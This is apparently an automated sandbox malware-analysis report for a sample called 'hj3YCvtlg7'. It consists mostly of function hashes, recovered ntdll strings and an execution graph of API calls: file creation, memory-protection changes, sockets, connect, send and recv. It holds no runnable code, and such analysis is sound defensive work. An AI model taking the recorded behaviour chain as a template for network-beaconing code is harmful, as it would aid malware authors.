                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9b3c102faf5e2b01819c93eabb7c94a518f708ddb4a01bdfd94ff61da44c7f88
                                                                                              • Instruction ID: e96d7e270f179ab55a5510a91dfb645ae5ba3811d41f26684d2cda3b24fa81e0
                                                                                              • Opcode Fuzzy Hash: 9b3c102faf5e2b01819c93eabb7c94a518f708ddb4a01bdfd94ff61da44c7f88
                                                                                              • Instruction Fuzzy Hash: F890022124550802D6407158C4187074006D7D0601F56C031A0024564DC6168B6567B2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1806fd3bcd3bb71a097d62487ca7a5ce529e2411d6bb6ce6e707553ec6f249d6
                                                                                              • Instruction ID: b4217b1437d65659a256b99a2095463e0f44cce8bd75ab5093f7e387ccb1db6f
                                                                                              • Opcode Fuzzy Hash: 1806fd3bcd3bb71a097d62487ca7a5ce529e2411d6bb6ce6e707553ec6f249d6
                                                                                              • Instruction Fuzzy Hash: EB90023160960402D60071588518706500597D0201F66C431A0424578DC7958B5166A3
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1e5e8a6ffb5beccaf085e08fb4e9b2ec0f53e57d027d087d40fb9b1813f21c2b
                                                                                              • Instruction ID: ea9e702fbc1a256cb2d72fdf1556f28a4baa4ea54ee583244b53cd6d087a9242
                                                                                              • Opcode Fuzzy Hash: 1e5e8a6ffb5beccaf085e08fb4e9b2ec0f53e57d027d087d40fb9b1813f21c2b
                                                                                              • Instruction Fuzzy Hash: 1F90022124955102D650715C84086168005B7E0201F56C031A08145A4DC5558A556322
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7df000a425f2a28584baa55b74dc7d4b7966c2629c521f3ed0b4ff16bdd25dad
                                                                                              • Instruction ID: dd89340cb0f5596f32c6f382878338044ba0ede3612c73785ff05b0b4c4ac8d3
                                                                                              • Opcode Fuzzy Hash: 7df000a425f2a28584baa55b74dc7d4b7966c2629c521f3ed0b4ff16bdd25dad
                                                                                              • Instruction Fuzzy Hash: 8390023520550402DA1071589808646404697D0301F56D431A0424568DC6548AA1A222
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1a85e760d6c95d100b533167cfe17dcceef86e3e0146bc41c67937e0d497a8af
                                                                                              • Instruction ID: 1359757081b8d6f89ee8978b24859fff7a0f614623e52348569b2cc399182689
                                                                                              • Opcode Fuzzy Hash: 1a85e760d6c95d100b533167cfe17dcceef86e3e0146bc41c67937e0d497a8af
                                                                                              • Instruction Fuzzy Hash: 51900231206501429A4072589808A4E810597E1302F96D435A0015564CC9148A615322
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                              • Instruction ID: a6829e4c67f372c4345bb54c3a2bcf42fca153cb3710fa567e667a5536103ef7
                                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                              • API String ID: 48624451-2108815105
                                                                                              • Opcode ID: 0254376a9836a6fc6d798ddbb9bfe2ce9649f23f404270ac800f6820e902fb0c
                                                                                              • Instruction ID: b1c81f082015e3e1ff10aa9068d89fecfdd11b82b8a53be36107d0e4522771e2
                                                                                              • Opcode Fuzzy Hash: 0254376a9836a6fc6d798ddbb9bfe2ce9649f23f404270ac800f6820e902fb0c
                                                                                              • Instruction Fuzzy Hash: 7F51D5B1B00216AFDF51DB9C8C9097EFBBCBB48240B14C169E965D7646D734DE04CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                              • API String ID: 48624451-2108815105
                                                                                              • Opcode ID: e434be150d1d5034ae9b426946a4487198b04ac5848658ae6d8fc0e594c479c2
                                                                                              • Instruction ID: 2484f09295321102679f4ece7783770374025f08f51f0e7e7bec6b488a5b1c37
                                                                                              • Opcode Fuzzy Hash: e434be150d1d5034ae9b426946a4487198b04ac5848658ae6d8fc0e594c479c2
                                                                                              • Instruction Fuzzy Hash: D451F6B1A0064AAECB31DF5CC99097FFBF8EB44200B648899E997D7646E674DE018760
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01794725
                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01794742
                                                                                              • ExecuteOptions, xrefs: 017946A0
                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01794787
                                                                                              • Execute=1, xrefs: 01794713
                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01794655
                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017946FC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                              • API String ID: 0-484625025
                                                                                              • Opcode ID: 1da4f8b72122beb2543e649d482df790e5d0dc61435ea2332d9126a198b55d87
                                                                                              • Instruction ID: c36553e278c428ac8b2bdb3c7bf9d8ce048224f4f87d58cf864866e6b4ab8ef9
                                                                                              • Opcode Fuzzy Hash: 1da4f8b72122beb2543e649d482df790e5d0dc61435ea2332d9126a198b55d87
                                                                                              • Instruction Fuzzy Hash: 75511B71600219AAEF15AAA8EC99FADF7ACEF14304F8400D9EA05A71C1D7B0DA45CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: __aulldvrm
                                                                                              • String ID: +$-$0$0
                                                                                              • API String ID: 1302938615-699404926
                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                              • Instruction ID: fc667bba44a4044465d3398c88dc1083ffdf979374424fc90857a48f389340eb
                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                              • Instruction Fuzzy Hash: CC81A070F4524A9EEF258E6CC8917FEFBB9AF46320F18415ADD51E7291C73898408B91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: %%%u$[$]:%u
                                                                                              • API String ID: 48624451-2819853543
                                                                                              • Opcode ID: 6c1e76bfc361b309b35f0d55fab752050962925252ed9f410fa94e8612ae5d7d
                                                                                              • Instruction ID: 8c6c7795221a3f309ec49c41f5346410c9e0435daa3245c2ea01b1541b0e0358
                                                                                              • Opcode Fuzzy Hash: 6c1e76bfc361b309b35f0d55fab752050962925252ed9f410fa94e8612ae5d7d
                                                                                              • Instruction Fuzzy Hash: D921817AA0021DABDB11DE79CC44AAEFBF9AF54650F044116E915E3205E7319A028BA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017902BD
                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017902E7
                                                                                              • RTL: Re-Waiting, xrefs: 0179031E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                              • API String ID: 0-2474120054
                                                                                              • Opcode ID: 184d412b8d9b2b05e641a933c2db52f6428320f2cace16b946ddacaf1f66c80a
                                                                                              • Instruction ID: 0398d7809a5c936a496418bf9516e0741106963cf7f255da7569b1e117a08df3
                                                                                              • Opcode Fuzzy Hash: 184d412b8d9b2b05e641a933c2db52f6428320f2cace16b946ddacaf1f66c80a
                                                                                              • Instruction Fuzzy Hash: E6E1AB716187419FEB25CF2CD884B2AFBE4AB84314F140A5DF5A5CB2E1D774D948CB42
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • RTL: Resource at %p, xrefs: 01797B8E
                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01797B7F
                                                                                              • RTL: Re-Waiting, xrefs: 01797BAC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                              • API String ID: 0-871070163
                                                                                              • Opcode ID: b73db9e5875d0b868c59304b6010cef621bc701908d510ac43eea9d62b78625d
                                                                                              • Instruction ID: 34376e181398082789d36b94b43678a357319e66b62b4c97609888c26fe7c05d
                                                                                              • Opcode Fuzzy Hash: b73db9e5875d0b868c59304b6010cef621bc701908d510ac43eea9d62b78625d
                                                                                              • Instruction Fuzzy Hash: 9B41D2317047029FDB25DE29D840B6AF7E6EF98710F100A1DFE5ADB680DBB1E9058B91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0179728C
                                                                                              Strings
                                                                                              • RTL: Resource at %p, xrefs: 017972A3
                                                                                              • RTL: Re-Waiting, xrefs: 017972C1
                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01797294
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                              • API String ID: 885266447-605551621
                                                                                              • Opcode ID: a0d34dd55dd3381ed20da8ad2ce97379d104de1433a61869d6e378bc15f0d536
                                                                                              • Instruction ID: 41ccccec3631e508df0e5faae036b85c319b02d4541762d24077b5be8a1f0050
                                                                                              • Opcode Fuzzy Hash: a0d34dd55dd3381ed20da8ad2ce97379d104de1433a61869d6e378bc15f0d536
                                                                                              • Instruction Fuzzy Hash: 25411031614202ABCB25CE29DC81B6AFBA6FF94710F100658FD55AB280DB70E8068BD1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: %%%u$]:%u
                                                                                              • API String ID: 48624451-3050659472
                                                                                              • Opcode ID: 4b018c4e89ad893542348c7db9d3f304cbc189f5f7fb58baa2c8437803148803
                                                                                              • Instruction ID: 1239a3370454f295d773961046354361464e60780b7f443ad738a404e22f19d9
                                                                                              • Opcode Fuzzy Hash: 4b018c4e89ad893542348c7db9d3f304cbc189f5f7fb58baa2c8437803148803
                                                                                              • Instruction Fuzzy Hash: F0314172A00219AFDB20DF2DCC44BAEF7B8AB54610F54455AED49E3245EF30AA458BA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: __aulldvrm
                                                                                              • String ID: +$-
                                                                                              • API String ID: 1302938615-2137968064
                                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                              • Instruction ID: 42db155ea4b44b7f28b8b00fa33eb8e18384742468fcba5fd978021afddd3ca8
                                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                              • Instruction Fuzzy Hash: B491D671E002069BEF28CF6DC881AFEFBA9EF447A8F54451AED55E72C4D73489818B11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $$@
                                                                                              • API String ID: 0-1194432280
                                                                                              • Opcode ID: 6e7c940d83f2fccf37da5863615b81d3e7fbc7cab1c585d867ee54c6da86aba5
                                                                                              • Instruction ID: b9d07e1727f254928b0668f64349f3f947d95071648d9182a0a8e9088cb2ec01
                                                                                              • Opcode Fuzzy Hash: 6e7c940d83f2fccf37da5863615b81d3e7fbc7cab1c585d867ee54c6da86aba5
                                                                                              • Instruction Fuzzy Hash: CD812A71D402799BDB319B54CC44BEAF7B8AF48714F1441EAEA09B7241E7709E85CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 017ACFBD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallFilterFunc@8
                                                                                              • String ID: @$@4_w@4_w
                                                                                              • API String ID: 4062629308-713214301
                                                                                              • Opcode ID: c947538d8c760a6ee067b4c3ae726fd7f69aa054e05ff6e09db42c71bdac6664
                                                                                              • Instruction ID: 0cecd451173ab2f64df69d689d345252cdf160cc3ab290731d8c203cb063335e
                                                                                              • Opcode Fuzzy Hash: c947538d8c760a6ee067b4c3ae726fd7f69aa054e05ff6e09db42c71bdac6664
                                                                                              • Instruction Fuzzy Hash: A241C172940215DFDB319FA9C884AAEFBB8FF94B10F10462AE914DB359E774C901CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Execution Graph

                                                                                              Execution Coverage:2.3%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:4.7%
                                                                                              Total number of Nodes:444
                                                                                              Total number of Limit Nodes:15
                                                                                              execution_graph 13756 fd9edd9 13758 fd9edf0 13756->13758 13757 fd9eecd 13758->13757 13759 fda2382 ObtainUserAgentString 13758->13759 13759->13757 13493 fd9b2dd 13494 fd9b31a 13493->13494 13495 fd9b3fa 13494->13495 13496 fd9b328 SleepEx 13494->13496 13500 fda5f12 13494->13500 13509 fd9c432 13494->13509 13519 fd9b0f2 13494->13519 13496->13494 13496->13496 13501 fda5f48 13500->13501 13502 fda60e9 13501->13502 13506 fda6232 NtCreateFile 13501->13506 13508 fda6134 13501->13508 13525 fda6f82 13501->13525 13504 fda6125 13502->13504 13537 fda5842 13502->13537 13545 fda5922 13504->13545 13506->13501 13508->13494 13510 fd9c45b 13509->13510 13518 fd9c4c9 13509->13518 13511 fda6232 NtCreateFile 13510->13511 13510->13518 13512 fd9c496 13511->13512 13513 fd9c4c5 13512->13513 13566 fd9c082 13512->13566 13514 fda6232 NtCreateFile 13513->13514 13513->13518 13514->13518 13516 fd9c4b6 13516->13513 13575 fd9bf52 13516->13575 13518->13494 13520 fd9b109 13519->13520 13521 fd9b1d3 13519->13521 13580 fd9b012 13520->13580 13521->13494 13523 fd9b113 13523->13521 13524 fda6f82 6 API calls 13523->13524 13524->13521 13527 fda6fb8 13525->13527 13526 fda7022 13526->13501 13527->13526 13529 fda7081 13527->13529 13553 fda35b2 13527->13553 13529->13526 13530 fda7134 13529->13530 13532 fda7117 getaddrinfo 13529->13532 13530->13526 13533 fda71b2 13530->13533 13556 fda3732 13530->13556 13532->13530 13533->13526 13559 fda36b2 13533->13559 13535 fda77f4 setsockopt recv 13535->13526 13536 fda7729 13536->13526 13536->13535 13538 fda586d 13537->13538 13562 fda6232 13538->13562 13540 fda5906 13540->13502 13541 fda5888 13541->13540 13542 fda6f82 6 API calls 13541->13542 13543 fda58c5 13541->13543 13542->13543 13543->13540 13544 fda6232 NtCreateFile 13543->13544 13544->13540 13546 fda59c2 13545->13546 13547 fda6232 NtCreateFile 13546->13547 13550 fda59d6 13547->13550 13548 fda5a9f 13548->13508 13549 fda5a5d 13549->13548 13551 fda6232 NtCreateFile 13549->13551 13550->13548 13550->13549 13552 fda6f82 6 API calls 13550->13552 13551->13548 13552->13549 13554 fda360a socket 13553->13554 13555 fda35ec 13553->13555 13554->13529 13555->13554 13557 fda376a 13556->13557 13558 fda3788 connect 13556->13558 13557->13558 13558->13533 13560 fda3705 send 13559->13560 13561 fda36e7 13559->13561 13560->13536 13561->13560 13564 fda625c 13562->13564 13565 fda6334 13562->13565 13563 fda6410 NtCreateFile 13563->13565 13564->13563 13564->13565 13565->13541 13567 fd9c420 13566->13567 13568 fd9c0aa 13566->13568 13567->13516 13568->13567 13569 fda6232 NtCreateFile 13568->13569 13570 fd9c1f9 13569->13570 13571 fda6232 NtCreateFile 13570->13571 13574 fd9c3df 13570->13574 13572 fd9c3c9 13571->13572 13573 fda6232 NtCreateFile 13572->13573 13573->13574 13574->13516 13576 fd9bf70 13575->13576 13577 fd9bf84 13575->13577 13576->13513 13578 fda6232 NtCreateFile 13577->13578 13579 fd9c046 13578->13579 13579->13513 13582 fd9b031 13580->13582 13581 fd9b0cd 13581->13523 13582->13581 13583 fda6f82 6 API calls 13582->13583 13583->13581 13855 fd9eedd 13857 fd9ef06 13855->13857 13856 fd9efa4 13857->13856 13858 fd9b8f2 NtProtectVirtualMemory 13857->13858 13859 fd9ef9c 13858->13859 13860 fda2382 ObtainUserAgentString 13859->13860 13860->13856 13951 fda8a1f 13952 fda8a25 13951->13952 13955 fd9c5f2 13952->13955 13954 fda8a3d 13956 fd9c5fb 13955->13956 13957 fd9c60e 13955->13957 13956->13957 13958 fda1662 6 API calls 13956->13958 13957->13954 13958->13957 13744 fda7e12 13745 fda6942 13744->13745 13746 fda7e45 NtProtectVirtualMemory 13745->13746 13747 fda7e70 13746->13747 13959 fd9c613 13960 fd9c620 13959->13960 13961 fd9c684 13960->13961 13962 fda7e12 NtProtectVirtualMemory 13960->13962 13962->13960 13861 fda0cd4 13863 fda0cd8 13861->13863 13862 fda1022 13863->13862 13867 fda0352 13863->13867 13865 fda0f0d 13865->13862 13876 fda0792 13865->13876 13868 fda039e 13867->13868 13869 fda04ec 13868->13869 13870 fda058e 13868->13870 13872 fda0595 13868->13872 13871 fda6232 NtCreateFile 13869->13871 13870->13865 13874 fda04ff 13871->13874 13872->13870 13873 fda6232 NtCreateFile 13872->13873 13873->13870 13874->13870 13875 fda6232 NtCreateFile 13874->13875 13875->13870 13877 fda07e0 13876->13877 13878 fda6232 NtCreateFile 13877->13878 13880 fda090c 13878->13880 13879 fda0af3 13879->13865 13880->13879 13881 fda0352 NtCreateFile 13880->13881 13882 fda0602 NtCreateFile 13880->13882 13881->13880 13882->13880 13816 fda014a 13817 fda0153 13816->13817 13822 fda0174 13816->13822 13818 fda2382 ObtainUserAgentString 13817->13818 13820 fda016c 13818->13820 13819 fda01e7 13821 fd9b0f2 6 API calls 13820->13821 13821->13822 13822->13819 13824 fd9b1f2 13822->13824 13825 fd9b20f 13824->13825 13826 fd9b2c9 13824->13826 13828 fda5f12 7 API calls 13825->13828 13829 fd9b242 13825->13829 13826->13822 13827 fd9b289 13827->13826 13831 fd9b0f2 6 API calls 13827->13831 13828->13829 13829->13827 13830 fd9c432 NtCreateFile 13829->13830 13830->13827 13831->13826 13963 fda7e0a 13964 fda7e45 NtProtectVirtualMemory 13963->13964 13965 fda6942 13963->13965 13966 fda7e70 13964->13966 13965->13964 13943 fda8a4d 13944 fda8a53 13943->13944 13947 fd9c782 13944->13947 13946 fda8a6b 13949 fd9c78f 13947->13949 13948 fd9c7ad 13948->13946 13949->13948 13950 fda1662 6 API calls 13949->13950 13950->13948 13732 fda6f82 13734 fda6fb8 13732->13734 13733 fda7022 13734->13733 13735 fda35b2 socket 13734->13735 13736 fda7081 13734->13736 13735->13736 13736->13733 13737 fda7134 13736->13737 13739 fda7117 getaddrinfo 13736->13739 13737->13733 13738 fda3732 connect 13737->13738 13740 fda71b2 13737->13740 13738->13740 13739->13737 13740->13733 13741 fda36b2 send 13740->13741 13743 fda7729 13741->13743 13742 fda77f4 setsockopt recv 13742->13733 13743->13733 13743->13742 13832 fda6f7a 13833 fda6fb8 13832->13833 13834 fda35b2 socket 13833->13834 13835 fda7081 13833->13835 13843 fda7022 13833->13843 13834->13835 13836 fda7134 13835->13836 13838 fda7117 getaddrinfo 13835->13838 13835->13843 13837 fda3732 connect 13836->13837 13841 fda71b2 13836->13841 13836->13843 13837->13841 13838->13836 13839 fda36b2 send 13842 fda7729 13839->13842 13840 fda77f4 setsockopt recv 13840->13843 13841->13839 13841->13843 13842->13840 13842->13843 13967 fda583a 13968 fda5841 13967->13968 13969 fda6f82 6 API calls 13968->13969 13971 fda58c5 13969->13971 13970 fda5906 13971->13970 13972 fda6232 NtCreateFile 13971->13972 13972->13970 13883 fd9f0fb 13885 fd9f137 13883->13885 13884 fd9f2d5 13885->13884 13886 fd9b8f2 NtProtectVirtualMemory 13885->13886 13887 fd9f28a 13886->13887 13888 fd9b8f2 NtProtectVirtualMemory 13887->13888 13890 fd9f2a9 13888->13890 13889 fd9f2cd 13891 fda2382 ObtainUserAgentString 13889->13891 13890->13889 13892 fd9b8f2 NtProtectVirtualMemory 13890->13892 13891->13884 13892->13889 13927 fda30b9 13928 fda30ed 13927->13928 13930 fda31f0 13927->13930 13929 fda6f82 6 API calls 13928->13929 13928->13930 13929->13930 13931 fda18be 13933 fda18c3 13931->13933 13932 fda19a6 13933->13932 13934 fda1995 ObtainUserAgentString 13933->13934 13934->13932 13791 fd9efbf 13793 fd9f016 13791->13793 13792 fd9f0bb 13794 fd9f0e8 13792->13794 13798 fd9b8f2 NtProtectVirtualMemory 13792->13798 13793->13792 13796 fd9b8f2 NtProtectVirtualMemory 13793->13796 13797 fd9f0f0 13793->13797 13795 fda2382 ObtainUserAgentString 13794->13795 13795->13797 13796->13792 13798->13794 13748 fda6232 13750 fda625c 13748->13750 13751 fda6334 13748->13751 13749 fda6410 NtCreateFile 13749->13751 13750->13749 13750->13751 13760 fd9c5f1 13761 fd9c60e 13760->13761 13762 fd9c606 13760->13762 13764 fda1662 13762->13764 13765 fda166b 13764->13765 13771 fda17ba 13764->13771 13766 fd9b0f2 6 API calls 13765->13766 13765->13771 13768 fda16ee 13766->13768 13767 fda1750 13770 fda183f 13767->13770 13767->13771 13772 fda1791 13767->13772 13768->13767 13769 fda6f82 6 API calls 13768->13769 13769->13767 13770->13771 13773 fda6f82 6 API calls 13770->13773 13771->13761 13772->13771 13774 fda6f82 6 API calls 13772->13774 13773->13771 13774->13771 13893 fd9b0f1 13894 fd9b109 13893->13894 13895 fd9b1d3 13893->13895 13896 fd9b012 6 API calls 13894->13896 13897 fd9b113 13896->13897 13897->13895 13898 fda6f82 6 API calls 13897->13898 13898->13895 13799 fda89b3 13800 fda89bd 13799->13800 13803 fd9d6d2 13800->13803 13802 fda89e0 13804 fd9d704 13803->13804 13805 fd9d6f7 13803->13805 13807 fd9d72d 13804->13807 13809 fd9d737 13804->13809 13811 fd9d6ff 13804->13811 13806 fd9b0f2 6 API calls 13805->13806 13806->13811 13812 fda32c2 13807->13812 13810 fda6f82 6 API calls 13809->13810 13809->13811 13810->13811 13811->13802 13813 fda32cb 13812->13813 13814 fda32df 13812->13814 13813->13814 13815 fda30c2 6 API calls 13813->13815 13814->13811 13815->13814 13775 fda89f1 13776 